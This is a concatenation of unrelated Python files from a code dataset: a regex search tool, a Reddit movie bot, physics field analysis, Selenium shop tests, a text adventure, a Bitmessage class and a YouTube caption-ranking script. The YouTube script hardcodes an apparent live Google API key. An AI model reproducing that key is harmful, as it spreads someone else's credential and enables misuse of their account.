text\nprint(seed_text)\n","sub_path":"python/serving/example/l10c03_nlp_constructing_text_generation_model.py","file_name":"l10c03_nlp_constructing_text_generation_model.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"256688034","text":"\"\"\"\nImplement a Python script that searches for lines matching regular expression -r (--regex) in file/s -f (--files).\nUse STDIN if file/s option wasn’t provided.\nAssume that input is ASCII, you don't need to deal with a different encoding.\nIf a line matches, print it. 
Please print the file name and the line number for every match.\nThe script accepts list optional parameters which are mutually exclusive:\n-u ( --underscore ) which prints '^' under the matching text\n-c ( --color ) which highlight matching text [1]\n-m ( --machine ) which generate machine-readable output\nformat: file_name:no_line:start_pos:matched_text\nMultiple matches on a single line are allowed, without overlapping.\n\"\"\"\nimport re\nimport sys\nimport os\nimport glob\nimport argparse\nfrom functools import wraps\n\n\nclass SearchPattern:\n\n def __init__(self, files=None, regex=None, color=None, machine=None):\n self.__files = files\n self.__regex = regex\n self.__color = color\n self.__machine = machine\n\n @property\n def opts_val(self):\n \"\"\"\n Using @property decorator to achieve getters and setters behaviour (encapsulate the CL options)\n \"\"\"\n return self.__files, self.__regex, self.__color, self.__machine\n\n @opts_val.setter\n def opts_val(self, *args):\n \"\"\"\n Setter func\n \"\"\"\n self.__files = args[0]\n self.__regex = args[1]\n self.__color = args[2]\n self.__machine = args[3]\n\n @staticmethod\n def wrapper_color(func):\n \"\"\"\n returns a function that take single arg, a Wrapper function\n to Decorate the color_pattern func.\n It can be extended for multiple colors patterns highlight\n \"\"\"\n\n @wraps(func)\n def surround_value(word):\n \"\"\"\n A class of Color can be created for variety of color to highlight the pattern\n \"\"\"\n end = '\\x1b[0m'\n color = '\\x1b[4;34;41m'\n return '{}{}{}'.format(color, word, end)\n return surround_value\n\n @staticmethod\n def color_the_pattern(line, regex, color_word):\n \"\"\"\n This to print colored pattern in output, with -c option on command line\n it takes a line, regex and wrapper func(decorator) as argument which should be colored\n \"\"\"\n result = ''\n for word in line.split():\n if regex in word:\n re_pos = re.search(regex, word)\n re_start = re_pos.start()\n re_end = re_pos.end()\n start = word[0:re_start]\n word_color = word[re_start:re_end]\n end = word[re_end:]\n result += start + ' {}'.format(color_word(word_color)) + end\n else:\n result += ' {}'.format(word)\n yield result\n\n @staticmethod\n def get_iterator_values(iterator):\n \"\"\"\n get iterator which is start and end index of matched regex\n and return a list of tuple(start,end) indexes\n \"\"\"\n res = [(v.start(), v.end()) for v in iterator]\n return res\n\n @staticmethod\n def remove_files_post_use():\n \"\"\"\n use the intermediate files as temp and remove it after use\n \"\"\"\n file_list = glob.glob('*.text')\n for file in file_list:\n os.remove(file)\n\n @staticmethod\n def machine_readable(line, regex):\n \"\"\"\n format -> file_name:line_no:start_pos:matched_text\n reads the output file from default print format and convert to machine readable format\n \"\"\"\n pattern_start_index = re.search(regex, line)\n start_pos = pattern_start_index.start()\n add_start_pos = [val.strip() for val in line.split(\":\")]\n add_start_pos.insert(2, str(start_pos))\n add_start_pos = add_start_pos[0:3]\n # print(':'.join(add_start_pos) + \":\" + ' '.join(re.findall(regex, line)))\n add_start_pos_str = ':'.join(add_start_pos)\n patter_str = ' '.join(re.findall(regex, line))\n yield \"{}:{}\".format(add_start_pos_str, patter_str)\n\n @staticmethod\n def parse_stdin_default(std_input, regex):\n \"\"\"\n Parse the Standard input data, the case when file name is not provided and\n raw data provided as Standard input\n default output, :line_no: line\n -m 
then :line_no:start_pos:line\n -c then color the matched pattern in output\n \"\"\"\n for line_no, line in enumerate(std_input, 1):\n match = re.finditer(r'\\b{}\\b'.format(regex), line)\n found = [val for val in match]\n if len(found) > 0:\n # with open('default_output_stdin.text', 'a') as f:\n # f.write(\":{}:{}\".format(line_no, line))\n yield \":{}:{}\".format(line_no, line)\n\n @staticmethod\n def pattern_search_files(files, regex):\n \"\"\"\n When one or more file names are provided on the command line,\n parse the files one by one, search the pattern and yield the output\n :param files: All the files provided with -f option on command line\n :param regex: regular expression to be searched in the file\n \"\"\"\n for file in files:\n try:\n with open(file, 'r', encoding=\"ascii\") as file_line:\n for line_no, line in enumerate(file_line, 1):\n match = re.finditer(r'{}\\b'.format(regex), line)\n found = [val for val in match]\n if len(found) > 0:\n # with open('default_output_files.text', 'a') as f:\n # f.write(\"{}: {}: {}\".format(file, line_no, line))\n yield \"{}: {}: {}\".format(file, line_no, line)\n except Exception:\n # keep going with the remaining files instead of aborting the whole loop\n print(\"File {} does not exist or cannot be read\".format(file))\n\n @staticmethod\n def file_color_print(files):\n with open(files, 'r') as f:\n for line in f:\n colored = search.color_the_pattern(line, opts.regex, search.wrapper_color(''))\n print(colored)\n\n\nif __name__ == \"__main__\":\n \"\"\"\n Grabs the command line options\n -f , , default=[sys.stdin]\n default=\"file_name:no_line:start_pos:matched_text\"\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('-r', '--regex', type=str, help=\"Regex pattern to search in file\")\n parser.add_argument('-f', '--files', help=\"Files on command line\", nargs='*')\n # group.add_argument('-u', '--underscore', type=str, default=\"^\", help=\"prints '^' under the matching text\")\n group = parser.add_mutually_exclusive_group()\n group.add_argument('-c', '--color', action='store_true', help=\"Highlights matching text [1]\")\n group.add_argument('-m', '--machine', action='store_true', help=\"machine-readable output\")\n opts = parser.parse_args()\n\n # When the file/s name/s not provided on the command line then read from STDIN\n # Exp: cat file.text | python file_parse.py -r find_this_text\n\n search = SearchPattern(opts.files, opts.regex, opts.color, opts.machine)\n\n print(search.opts_val)\n\n try:\n if opts.files:\n if opts.machine:\n for line in search.pattern_search_files(opts.files, opts.regex):\n print(next(search.machine_readable(line.strip(), opts.regex)))\n\n elif opts.color:\n for line in search.pattern_search_files(opts.files, opts.regex):\n print(next(search.color_the_pattern(line.strip(), opts.regex, search.wrapper_color(''))))\n else:\n for line in search.pattern_search_files(opts.files, opts.regex):\n print(line.strip())\n\n\n elif sys.stdin:\n input_stdin = [x for x in sys.stdin]\n # the parsers are generators, so they must be consumed to produce output\n if opts.machine:\n for line in search.parse_stdin_default(input_stdin, opts.regex):\n print(next(search.machine_readable(line.strip(), opts.regex)))\n elif opts.color:\n for line in search.parse_stdin_default(input_stdin, opts.regex):\n print(next(search.color_the_pattern(line.strip(), opts.regex, search.wrapper_color(''))))\n else:\n for line in search.parse_stdin_default(input_stdin, opts.regex):\n print(line.strip())\n\n except Exception as e:\n print(e)\n print('Please use proper format and filename/regex to parse a file')\n print('“Use <-h > For help”')\n # raise 
Exception\n","sub_path":"parser_file_v3.py","file_name":"parser_file_v3.py","file_ext":"py","file_size_in_byte":8533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"157659219","text":"import praw\nimport pprint\nimport urllib\nimport mechanicalsoup\nimport re\nimport omdb\nimport requests\n\nreddit = praw.Reddit(client_id='',\n client_secret='',\n user_agent='',\n username='Username',\n password='Password')\n\nsubreddit = reddit.subreddit('MovieSuggestions')\ncomments = subreddit.stream.comments()\nbr = mechanicalsoup.StatefulBrowser()\n\n\ndef info(fType, x, text):\n for x in range(len(fType)):\n wurl = fType[x].replace(\" \", \"+\")\n newURL = \"http://www.omdbapi.com/?t={}&apikey=\".format(\n wurl)\n html = requests.get(newURL).text.encode('utf8')\n br.open(newURL)\n\n title = re.findall(r'(?<=\"Title\":\")(.*?)(?=\",)', html)\n year = re.findall(r'(?<=\"Year\":\")(.*?)(?=\",)', html)\n rate = re.findall(r'(?<=\"Rated\":\")(.*?)(?=\",)', html)\n rating = re.findall(r'(?<=\"imdbRating\":\")(.*?)(?=\")', html)\n director = re.findall(r'(?<=\"Director\":\")(.*?)(?=\",)', html)\n summary = re.findall(r'(?<=\"Plot\":\")(.*?)(?=\",)', html)\n error = re.search(r'(?<=\"Error\":)(.*?)(?=!\"})', html)\n\n if error:\n continue\n else:\n if title[0] == fType[x]:\n print(title[0])\n print(year[0])\n print(rate[0])\n print(rating[0])\n print(director[0])\n print(summary[0])\n else:\n continue\n\n\nf = 1\n\nfor comment in comments:\n try:\n author = str(comment.author) # Get author\n except AttributeError: # check if the author has been deleted\n print(\"Author has been deleted\")\n continue\n\n print(\"======================================================\")\n print(\"New Comment # \" + str(f) + \" by \" +\n author.encode('utf-8') + \"\")\n f += 1\n text = str(comment.body.encode('utf-8')) # Fetch body\n print(text)\n\n NumMultiWord = re.findall(\n r'([0-9]+(?= [A-Z])(?: [A-Z][a-z]+)+)', text)\n a = len(NumMultiWord)\n info(NumMultiWord, a, text)\n text = re.sub(r'([0-9]+(?= [A-Z])(?: [A-Z][a-z]+)+)', '', text)\n\n multiWordNum = re.findall(\n r'(?=.*[0-9]+)(?:[A-Z][a-z]*)(?: of the| the| of| a| to| to the| or| and| for the| for a| in the| for| on the| at| and the| from| at the| of a| in)*(?: [0-9]*)', text)\n b = len(multiWordNum)\n info(multiWordNum, b, text)\n text = re.sub(r'(?=.*[0-9]+)(?:[A-Z][a-z]*)(?: of the| the| of| a| to| to the| or| and| for the| for a| in the| for| on the| at| and the| from| at the| of a| in)*(?: [0-9]*)', '', text)\n\n multiWord = re.findall(\n r'([A-Z][a-z]*(?= [A-Z]*)(?: [A-Z][a-z]*)*)(?: of the| of a | and the| at the| to the| for the| in the| of| a| to| or| and| for a| for| on the| at| from| in)*(?: [A-Z][a-z]*)+', text)\n c = len(multiWord)\n info(multiWord, c, text)\n text = re.sub(r'([A-Z][a-z]*(?= [A-Z]*)(?: [A-Z][a-z]*)*)(?: of the| of a | and the| at the| to the| for the| in the| of| a| to| or| and| for a| for| on the| at| from| in)*(?: [A-Z][a-z]*)+', '', text)\n\n OneWordNum = re.findall(\n r'([A-Z][a-z]+(?= [0-9]+)(?: [0-9]*))', text)\n d = len(OneWordNum)\n info(OneWordNum, d, text)\n text = re.sub(r'([A-Z][a-z]+(?= [0-9]+)(?: [0-9]*))', '', text)\n\n NumOneWord = re.findall(\n r'([0-9]*(?= [A-Z][a-z]+)(?: [A-Z][a-z]+))', text)\n e = len(NumOneWord)\n info(NumOneWord, e, text)\n text = re.sub(r'([0-9]*(?= [A-Z][a-z]+)(?: [A-Z][a-z]+))', '', text)\n\n oneWord = re.findall(r'([A-Z][a-z]+)', text)\n f = len(oneWord)\n info(oneWord, f, 
text)\n","sub_path":"MovieBot.py","file_name":"MovieBot.py","file_ext":"py","file_size_in_byte":3593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"180947277","text":"class Solution(object):\n def transpose(self, A):\n \"\"\"\n :type A: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n result = [[] for i in range(len(A[0]))]\n for i, _i in enumerate(A):\n for j, _j in enumerate(A[i]):\n result[j].append(_j)\n return result\n\n\nsolution = Solution()\n\ntests = (\n ([[1, 2, 3], [4, 5, 6], [7, 8, 9]], [[1, 4, 7], [2, 5, 8], [3, 6, 9]]),\n ([[1, 2, 3], [4, 5, 6]], [[1, 4], [2, 5], [3, 6]])\n)\n\nfor _input, expected_result in tests:\n actual_result = solution.transpose(_input)\n assert actual_result == expected_result, f'{actual_result} != {expected_result}, {_input}'\n","sub_path":"867-transponse-matrix.py","file_name":"867-transponse-matrix.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"631325294","text":"import numpy\nimport sdf\nimport constant as const\nimport scipy.signal as signal\nimport numpy as np\npi=3.14\ndef E_x_y_zxx(a): \n\tsdfdir=const.sdfdir +str(a).zfill(const.filenumber)+\".sdf\"\n\tdata=sdf.read(sdfdir,dict=True)\n\tEx=data[\"Electric Field/Ex\"].data\n\tEx_y0=Ex[...,int(const.Ny/2)]\n\tEy=data[\"Electric Field/Ey\"].data\n\tEy_y0=Ey[...,int(const.Ny/2)]\n\tk,x,zxx=signal.stft(Ey_y0,fs=2*pi/const.delta_x,nperseg=const.nperseg)\n\tzxx=abs(zxx)\n\tindex = np.unravel_index(zxx.argmax(),zxx.shape)\n\tk_x=np.ones(const.Nx)*k[index[0]]\n\tfor i in range(0,const.Nx):\n\t\tx=i\n\t\ta=zxx[...,int(x/const.nperseg)]\n\t\ta=a.tolist()\n\t\ta[0]=0\n\t\tmax_index=a.index(max(a))\n\t\tif max(a) > 0.2 * zxx[index[0]][index[1]]:\n\t\t\tk_x[i]=(k[max_index])\n\tne=data['Derived/Number_Density/electron1'].data\n\tne_y0=ne[...,int(const.Ny/2)]\n\n\treturn [Ex_y0,Ey_y0,zxx,ne_y0,k_x]\ndef k(x,zxx):\n\ta=zxx[...,int(x/const.nperseg)]\n\ta=a.tolist()\n\ta[0]=0\n\tmax_index=a.index(max(a))\n\t# index=(max_index*pi)/(len(a)*const.delta_x)\n\tindex = (pi/const.delta_x)/len(a) * max_index\n\t#print \"max(k_x),max_index,len(k_x),index\",max(a),max_index,len(a),index # ,index\n\treturn index\ndef scalar_p(Ex_y0):\n\tscalar_p=0\n\te=1.6e-19\n\tc=3e8\n\tm0=9.1e-31\n\timport constant as const\n\ta=np.zeros(const.Nx)\n\tx=const.Nx - 1\n\tfor i in range(0,x+1):\n\t\tscalar_p=Ex_y0[x-i]*const.delta_x+scalar_p \n\t#a.append(e*scalar_p/(m0*c**2)) \n\t\ta[x-i]=e*scalar_p/(m0*c**2) \n\t# print 'n_scalar',a\n\treturn a\ndef wp_2(x,ne_y0):\n\tne=ne_y0[x]\n\t#ne=1e25\n\te=1.6e-19\n\tm0=9.1e-31\n#\tprint \"ne\",ne\n\tw_p_2=ne*e**2/(m0*8.85e-12)\n#\tprint \"w_p\",w_p_2\n\treturn w_p_2\ndef ref_index(x,Ex_y0,Ey_y0,zxx,ne_y0,k_x):\n\tc=3e8\n\twp_x_2=wp_2(x,ne_y0)\n#\tprint \"wp^2\",wp_x_2\n\t#p_y0=scalar_p(Ex_y0)\n\tp_y0_x=p_y0[x]\n#\tprint \"scalar\",p_y0_x\n\t#k_x=k(x,zxx)\n\tk_x=k_x[x]\n\tw0=k_x*c/1\n#\tprint \"w0\",w0\n\ta=wp_x_2/(1+p_y0_x)\n\tb=(k_x*c)**2\n\tc=-(k_x*c)**2\n\t#print \"a,b,c\",a,b,c\n\treturn np.roots([a,b,c])\ndef ref_a(a): \n\tref=[]\n\tEx_y0,Ey_y0,zxx,ne_y0,k_x=E_x_y_zxx(a)\n\tx=const.Nx\n\tglobal p_y0\n\tp_y0=scalar_p(Ex_y0)\n\tfor b in range(0,x):\n\t\tc=ref_index(b,Ex_y0,Ey_y0,zxx,ne_y0,k_x)\n\t\t#print(\"c\",c)\n\t\ta= type(c) == numpy.ndarray\n\t\t#print(\"type\",a)\n\t\tif type(c) == numpy.ndarray:\n\t\t\tc=c[-1]\n\t\t#print(\"c[-1]\",c)\n\t\tref.append(c)\n\t#print(\"ref:\",type(ref[0]))\n\treturn ref\n#def help():\n#\tprint 
\"func.ref_a(a)\"\n#\tprint \"a,x=1,1\"\n#\tprint \"Ex_y0,Ey_y0,zxx,ne_y0,k_x=func.E_x_y_zxx(a)\"\n#\tprint \"global p_y0\"\n#\tprint \"func.p_y0=scalar_p(Ex_y0)\" \n#\tprint \"func.ref_index(x,Ex_y0,Ey_y0,zxx,ne_y0)\"\n","sub_path":"function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"445351023","text":"from .pages.product_page import ProductPage\nfrom .pages.login_page import LoginPage\nfrom .pages.locators import ProductPageLocators\nfrom .pages.locators import LoginPageLocators\nimport pytest\nfrom .pages.basket_page import BasketPage\nimport time\n\n@pytest.mark.parametrize('link', ProductPageLocators.PRODUCT_LINK_PARAMS)\n@pytest.mark.need_review\ndef test_guest_can_add_product_to_basket(browser, link):\n page = ProductPage(browser, link) \n page.open()\n page.add_product_to_basket()\n page.solve_quiz_and_get_code()\n time.sleep(5) # Without this function test does not work with Firefox. Firefox is so slow :(\n page.should_be_match_of_product_names_in_basket_message_and_product_page()\n page.should_be_basket_price_equal_to_added_product_price()\n\n@pytest.mark.xfail(reason=\"bug won't be fixed\")\ndef test_guest_cant_see_success_message_after_adding_product_to_basket(browser):\n page = ProductPage(browser, ProductPageLocators.PRODUCT_LINK)\n page.open()\n page.add_product_to_basket()\n page.should_not_be_basket_message()\n\ndef test_guest_cant_see_success_message(browser):\n page = ProductPage(browser, ProductPageLocators.PRODUCT_LINK)\n page.open()\n page.should_not_be_basket_message()\n\n@pytest.mark.xfail(reason=\"bug won't be fixed\")\ndef test_message_disappeared_after_adding_product_to_basket(browser):\n page = ProductPage(browser, ProductPageLocators.PRODUCT_LINK)\n page.open()\n page.add_product_to_basket()\n success_message_should_disappear()\n \ndef test_guest_should_see_login_link_on_product_page(browser):\n page = ProductPage(browser, ProductPageLocators.PRODUCT_LINK)\n page.open()\n page.should_be_login_link()\n\n@pytest.mark.need_review \ndef test_guest_can_go_to_login_page_from_product_page(browser):\n page = ProductPage(browser, ProductPageLocators.PRODUCT_LINK)\n page.open()\n page.go_to_login_page()\n login_page = LoginPage(browser, browser.current_url)\n login_page.should_be_login_page()\n\n@pytest.mark.need_review \ndef test_guest_cant_see_product_in_basket_opened_from_product_page(browser):\n page = ProductPage(browser, ProductPageLocators.PRODUCT_LINK)\n page.open()\n page.go_to_basket()\n basket_page = BasketPage(browser, browser.current_url)\n basket_page.should_not_be_products_in_basket()\n basket_page.should_be_empty_basket_message()\n \nclass TestUserAddToBasketFromProductPage():\n @pytest.fixture(scope=\"function\", autouse=True)\n def setup(self, browser):\n page = LoginPage(browser, ProductPageLocators.PRODUCT_LINK)\n page.open()\n page.go_to_login_page()\n page.register_new_user(str(time.time()) + \"@fakemail.org\", str(time.time()))\n page.should_be_authorized_user()\n \n def test_user_cant_see_success_message(self, browser):\n page = ProductPage(browser, ProductPageLocators.PRODUCT_LINK)\n page.open()\n page.should_not_be_basket_message()\n \n @pytest.mark.need_review \n def test_user_can_add_product_to_basket(self, browser):\n page = ProductPage(browser, ProductPageLocators.PRODUCT_LINK)\n page.open()\n page.add_product_to_basket()\n page.should_be_match_of_product_names_in_basket_message_and_product_page()\n 
page.should_be_basket_price_equal_to_added_product_price()","sub_path":"test_product_page.py","file_name":"test_product_page.py","file_ext":"py","file_size_in_byte":3299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"152354458","text":"from room import Room\nfrom player import Player\nfrom item import Item\nimport textwrap\n\nwrapper = textwrap.TextWrapper(width=50) \n\n# Declare all the rooms\n\nroom = {\n 'outside': Room(\"Outside Cave Entrance\",\n \"North of you, the cave mount beckons\"),\n\n 'foyer': Room(\"Foyer\", \"\"\"Dim light filters in from the south. Dusty\npassages run north and east.\"\"\"),\n\n 'overlook': Room(\"Grand Overlook\", \"\"\"A steep cliff appears before you, falling\ninto the darkness. Ahead to the north, a light flickers in\nthe distance, but there is no way across the chasm.\"\"\"),\n\n 'narrow': Room(\"Narrow Passage\", \"\"\"The narrow passage bends here from west\nto north. The smell of gold permeates the air.\"\"\"),\n\n 'treasure': Room(\"Treasure Chamber\", \"\"\"You've found the long-lost treasure\nchamber! Sadly, it has already been completely emptied by\nearlier adventurers. The only exit is to the south.\"\"\"),\n}\n\nitem = {\n 'sword': Item(\"Sword\",\n \"helps you fight against enemies\"),\n\n 'torch': Item('torch',\n 'helps you navigate in the dark'),\n\n 'food': Item('food',\n 'replinishes your health and gives you enegry')\n}\n\n\n# Link rooms together\n\nroom['outside'].n_to = room['foyer']\nroom['foyer'].s_to = room['outside']\nroom['foyer'].n_to = room['overlook']\nroom['foyer'].e_to = room['narrow']\nroom['overlook'].s_to = room['foyer']\nroom['narrow'].w_to = room['foyer']\nroom['narrow'].n_to = room['treasure']\nroom['treasure'].s_to = room['narrow']\n\n#\n# Main\n#\n\n# Make a new player object that is currently in the 'outside' room.\nnew_player = input(\"Please select your player name: \")\nprint('\\n')\nplayer_1 = Player(new_player, room['outside'])\n\n# Write a loop that:\nwhile (True):\n# * Prints the current room name\n current_room = player_1.current_room\n print(f\"\\nCurrent Room: {current_room.name}\")\n\n# * Prints the current description\n word_list = wrapper.wrap(text = current_room.description)\n [print(line) for line in word_list]\n [print(item) for item in current_room.items]\n print('----------------------------------')\n\n# * Waits for user input and decides what to do.\n selection = input(\"Which direction would you like to move?\\nnorth - south - east - west\\n\")\n direction = selection.lower()[0]\n\n# If the user enters a cardinal direction, attempt to move to the room there.\n if direction in ['n', 's', 'e', 'w']:\n player_1.move_player(direction)\n\n # If the user enters \"q\", quit the game.\n elif selection in ['quit', 'q', 'exit']:\n print(\"Thanks for playing!\")\n break\n else:\n print(\"*** Not a valid input. 
You remain in current room ***\")\n print(\"Please select a direction or quit the game (q)\")\n\n","sub_path":"src/adv.py","file_name":"adv.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"498186321","text":"import base64\nimport datetime\nimport json\n\nclass BitmessageMessage:\n\n def __init__(self, message_dict, client_address):\n self.encoding_type = message_dict['encodingType']\n\n self.from_address = message_dict['fromAddress']\n self.to_address = message_dict['toAddress']\n\n self.received_time_epoch = int(message_dict['receivedTime'])\n self.received_time = datetime.datetime.fromtimestamp(self.received_time_epoch)\n\n self.read = message_dict['read'] == True\n self.msgid = message_dict['msgid']\n\n self.subject_encoded = message_dict['subject']\n self.subject = base64.decodestring(self.subject_encoded)\n\n self.message_encoded = message_dict['message']\n self.message = base64.decodestring(self.message_encoded)\n self.direct = self.to_address == client_address\n\n def __repr__(self):\n return \"BitmessageMessage(id:{0})\".format(self.msgid)\n\n def __str__(self):\n return \\\n \"BitmessageMessage\\nFrom: {0}\\nTo: {1}\\nDate: {2}\\nSubject: {3}\\nMessage: {4}\".format(\n self.from_address,\n self.to_address,\n self.received_time.strftime(\"%Y-%m-%d %H:%M:%S\"),\n self.subject,\n self.message)\n\n def to_json(self):\n msg_dict = {\n \"encoding_type\": self.encoding_type,\n \"from_address\": self.from_address,\n \"received_time\": self.received_time.strftime('%Y-%m-%d %H:%M:%S'),\n \"msgid\": self.msgid,\n \"subject\": self.subject,\n \"message\": self.message\n }\n\n return json.dumps(msg_dict)\n","sub_path":"src/shared/bitmessage_communication/bitmessagemessage.py","file_name":"bitmessagemessage.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"119974839","text":"from json import JSONEncoder\nfrom quizc.model.quiz import Quiz\nfrom quizc.model.quiz_answers import QuizAnswer, Answer\n\nclass MyClass:\n Questions = []\n def __init__(self, x, y):\n self.Quiz = x\n self.Questions = []\n print('-------------')\n for i in y:\n question = {\"title\":i.title,\"type\":i.type}\n print(i.title)\n print(i.type)\n print(i.validations)\n print(i.additional_data)\n print('-------------')\n # self.y = y\n\n\nclass MyEncoder(JSONEncoder):\n def default(self, o):\n return o.__dict__\n\ndef save(data):\n json = MyEncoder().encode(data)\n f = open(\"quizc/data/myform.json\", \"w\")\n f.write(json)\n f.close()\n","sub_path":"quizc/utils/json_persistence.py","file_name":"json_persistence.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"450653908","text":"from __future__ import print_function\nfrom __future__ import division\nimport numpy as np\nimport json\n\nimport httplib2\nimport os\nimport sys\nimport datetime\nimport json\n\nfrom apiclient.discovery import build\nfrom apiclient.errors import HttpError\nimport numpy as np\nfrom bs4 import BeautifulSoup\nimport re\nimport nltk\nimport urllib3\nfrom operator import itemgetter\n\nfrom sklearn.externals import joblib\n\nfrom train_model import vectorize_on_training_set\nfrom nltk.stem import WordNetLemmatizer\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport time\n\n# Key and version data \nDEVELOPER_KEY = 
\"AIzaSyBEuuLWPO0AJIIp7TVGIB1uM_mNiNkMVbw\"\nYOUTUBE_READ_WRITE_SCOPE = \"https://www.googleapis.com/auth/youtube\"\nYOUTUBE_API_SERVICE_NAME = \"youtube\"\nYOUTUBE_API_VERSION = \"v3\"\n\n# Authenticate \nyoutube = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION, developerKey=DEVELOPER_KEY)\nwnl = WordNetLemmatizer()\n\n\n\"\"\"Returns the top ten search results for the query in the form \n {video_id:{\"thumbnail\":thumbnail_url, \"title\":video title}}\"\"\"\n\ndef query_search(query):\n\tcurrent_time = time.time()\n\t\t\n\tsearch_request = youtube.search().list(part=\"snippet\", q=query, maxResults=10, videoCaption=\"closedCaption\", type=\"video\")\n\t\n\tsearch_response = search_request.execute()\n\t\n\tsearch_results = {}\n\tfor search_result in search_response[\"items\"]:\n\t\tvideo_id = search_result[\"id\"][\"videoId\"]\n\t\tthumbnail = search_result[\"snippet\"][\"thumbnails\"][\"default\"][\"url\"]\n\t\ttitle = search_result[\"snippet\"][\"title\"]\n\t\tdescription = search_result[\"snippet\"][\"description\"]\n\t\tsearch_results[video_id] = {\"thumbnail\":thumbnail, \"title\":title, \"description\":description}\n\t\n\t# print('Query Finished: ' + str(time.time()-current_time))\n\n\treturn search_results\n\t\n\ndef has_english(vid_id):\n\thttp = urllib3.PoolManager() #init urllib\n\tresp = http.request('GET', 'http://video.google.com/timedtext',preload_content=False,\n\t\t\t\t\t fields={'type': 'list', 'v': vid_id})\n\tsub_dir_xml = resp.read()\n\tresp.close()\n\tdir_soup = BeautifulSoup(sub_dir_xml)\n\teng_track = dir_soup.find(lang_code=\"en\")\n\treturn False if eng_track is None else True\n\ndef get_transcript(vid_id):\n\t\"\"\"\n\tInput: \n\t\tvid_id: Youtube video id\n\tOutput:\n\t\ttranscript: Beautiful soup xml object of transcipt\n\t\tof the format:\n\t\t\n\t\t\t\n\t\t\t\tSPOKEN TEXT\n\t\t\t\n\t\t\n\t\"\"\"\n\tcurrent_time = time.time()\n\n\thttp = urllib3.PoolManager() #init urllib\n\tresp = http.request('GET', 'http://video.google.com/timedtext',preload_content=False,\n\t\t\t\t\t fields={'type': 'list', 'v': vid_id})\n\tsub_dir_xml = resp.read()\n\tresp.close()\n\tdir_soup = BeautifulSoup(sub_dir_xml)\n\teng_track = dir_soup.find(lang_code=\"en\")\n\tif eng_track is None:\n\t\treturn None\n\ttrack_resp = http.request('GET', 'http://video.google.com/timedtext',preload_content=False,\n\t\t\t\t\t\t\t fields={'type': 'track',\n\t\t\t\t\t\t\t\t\t 'v': vid_id, \n\t\t\t\t\t\t\t\t\t 'name': eng_track['name'].encode('unicode-escape'), \n\t\t\t\t\t\t\t\t\t 'lang': 'en'})\n\ttranscript_xml = track_resp.read()\n\ttrack_resp.close()\n\n\t# print('Transcript Finished: ' + str(time.time()-current_time))\n\n\treturn BeautifulSoup(transcript_xml).transcript\n\ndef get_tokens(text):\n\ttext = re.sub(\"'\", \"\\'\", text)\n\ttext = re.sub(\"\\n\", \" \", text)\n\ttext = re.sub(\"[:&%$#@!,.?]\", \"\", text)\n\treturn nltk.word_tokenize(text.lower())\n\ndef format_transcript(transcript):\n\t\"\"\"\n\tInputs:\n\t\tbeautifulsoup transcript\n\tOutputs:\n\t\tarray/dictionary formatted transcript\n\t\"\"\"\n\tcurrent_time = time.time()\n\n\tformatted_transcript = []\n\tfor text_soup in transcript.find_all(\"text\"):\n\t\ttext = text_soup.get_text()\n\t\tif len(text) > 0:\n\t\t\tline = {\n\t\t\t\t\t'text' : text,\n\t\t\t\t\t'dur' : text_soup['dur'] if 'dur' in text_soup else 0,\n\t\t\t\t\t'start' : text_soup['start'] if 'start' in text_soup else 0\n\t\t\t\t\t}\n\t\t\tformatted_transcript.append(line)\n\n\t# print('Transcript Formatting Finished: ' + 
str(time.time()-current_time))\n\n\treturn formatted_transcript\n\n\ndef get_flattened_transcript(vid_id):\n\ttranscript = get_transcript(vid_id)\n\tflat_text = \"\"\n\tif transcript is not None:\n\t\tfor text_soup in transcript.find_all(\"text\"):\n\t\t\ttext = text_soup.get_text()\n\t\t\tif len(text) > 0:\n\t\t\t\tflat_text += (text + \" \")\n\telse:\n\t\treturn None # The case where we could not get the transcript\n\treturn flat_text[:-1]\n\n\ndef get_formatted_transcript(vid_id):\n\t\"\"\"\n\tConvience method\n\t\"\"\"\n\ttranscript = get_transcript(vid_id)\n\tif transcript is None:\n\t\treturn None\n\treturn format_transcript(transcript)\n\t\n\n\"\"\"Assign conversationality scores to the videos returned and \nreturn a list with the video in ascending order of conversationality\nscore. The final list consists tuple of the form (video_info dictionary, score).\"\"\"\n\ndef rerank_search_results(model, search_results, tfv):\n\tbeginning_time = time.time()\n\t\t\n\t# print('Vectorized Set: ' + str(time.time() - beginning_time))\n\n\tvideos_with_score = [] # contain tuples of video dictionaries and their conversationality score\n\n\t# print('Beginning Search: ' + str(time.time() - beginning_time))\n\t\n\tfor video_id, video_info in search_results.iteritems():\n\t\t# print('Video: ' + str(time.time() - beginning_time))\n\t\tflattened_transcript = get_flattened_transcript(video_id)\n\t\tif flattened_transcript is not None: \n\t\t\tvectorized_captions = tfv.transform([flattened_transcript]) # using previous vectorizer\n\t\t\tconversationality_score = model.predict(vectorized_captions)\n\t\t\tvideos_with_score.append(({video_id : video_info}, conversationality_score[0]))\n\t\t# print('Finished Video: ' + str(time.time() - beginning_time))\n\n\t# print('Finished Search' + str(time.time() - beginning_time))\n\n\treturn sorted(videos_with_score, key=itemgetter(1), reverse=True)\n\t\ndef get_classifer():\n return joblib.load('./trained_models/svr.pkl')\n\ndef get_tfv():\n return joblib.load('./trained_models/tfv.pkl')\n\ndef get_wordcloud(vid_id):\n\ttranscript = 